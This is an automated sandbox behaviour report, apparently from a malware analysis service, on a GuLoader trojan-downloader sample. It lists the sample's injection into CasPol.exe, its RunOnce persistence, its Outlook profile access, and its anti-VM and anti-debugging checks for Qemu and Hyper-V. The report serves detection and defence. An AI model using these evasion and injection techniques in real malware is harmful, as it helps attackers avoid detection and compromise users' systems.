Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00B1E051 3_2_00B1E051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00D666C8 3_2_00D666C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00D603C0 3_2_00D603C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00F9D1A5 3_2_00F9D1A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00F97AD0 3_2_00F97AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00F9AA0A 3_2_00F9AA0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00F91D28 3_2_00F91D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01136862 3_2_01136862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_011364C8 3_2_011364C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01135330 3_2_01135330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0113AFC8 3_2_0113AFC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0113EFF0 3_2_0113EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0113B931 3_2_0113B931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0113BA30 3_2_0113BA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01134AE0 3_2_01134AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_011466A8 3_2_011466A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0114A108 3_2_0114A108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01146290 3_2_01146290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_011466A2 3_2_011466A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01142A28 3_2_01142A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1CF95E08 3_2_1CF95E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1CF94FF0 3_2_1CF94FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1CF946C4 3_2_1CF946C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1CF95D20 3_2_1CF95D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1CF96AF1 3_2_1CF96AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01132B98 3_2_01132B98
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325FB02 NtProtectVirtualMemory, 1_2_0325FB02
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325E349 NtAllocateVirtualMemory, 1_2_0325E349
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325FFD2 NtResumeThread, 1_2_0325FFD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00B1DDAE NtCreateThreadEx, 3_2_00B1DDAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process Stats: CPU usage > 98%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Jump to behavior
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File created: C:\Users\user\AppData\Local\Temp\nss7448.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/13@2/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File written: C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

Data Obfuscation

Source: Yara match File source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_713D30C0 push eax; ret 1_2_713D30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03252B6D push edi; iretd 1_2_03252B6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03252BAA push 00000008h; iretd 1_2_03252BAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03256618 push ebx; retf 1_2_0325665A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325821B push edi; iretd 1_2_0325821E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03254CAE push esi; retf 1_2_03254CBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03253A84 push ds; iretd 1_2_03253AD7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258A83 pushfd ; retn 0004h 1_2_03258AD4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03253C9D push ds; iretd 1_2_03253AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_3_00EE02B3 pushad ; retf 3_3_00EE02DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_3_00EE2ACE push esp; retf 3_3_00EE2AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_0113A159 push ebx; retf 3_2_0113A15B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_01131051 push eax; ret 3_2_011315E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_713D1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File created: C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2936 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03251B34 rdtsc 1_2_03251B34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9943 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe API call chain: ExitProcess graph end node
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052117582.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_713D1BFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258525 mov eax, dword ptr fs:[00000030h] 1_2_03258525
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325EF5D mov eax, dword ptr fs:[00000030h] 1_2_0325EF5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325D9AD mov eax, dword ptr fs:[00000030h] 1_2_0325D9AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_0325DF99 mov eax, dword ptr fs:[00000030h] 1_2_0325DF99
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258BC7 mov eax, dword ptr fs:[00000030h] 1_2_03258BC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03255004 mov eax, dword ptr fs:[00000030h] 1_2_03255004
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258C4F mov eax, dword ptr fs:[00000030h] 1_2_03258C4F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258CB1 mov eax, dword ptr fs:[00000030h] 1_2_03258CB1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258C90 mov eax, dword ptr fs:[00000030h] 1_2_03258C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258CE4 mov ebx, dword ptr fs:[00000030h] 1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258CE4 mov eax, dword ptr fs:[00000030h] 1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258AE0 mov eax, dword ptr fs:[00000030h] 1_2_03258AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258AEC mov eax, dword ptr fs:[00000030h] 1_2_03258AEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Code function: 1_2_03258CEC mov ebx, dword ptr fs:[00000030h] 1_2_03258CEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_011437F8 LdrInitializeThunk, 3_2_011437F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B10000
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
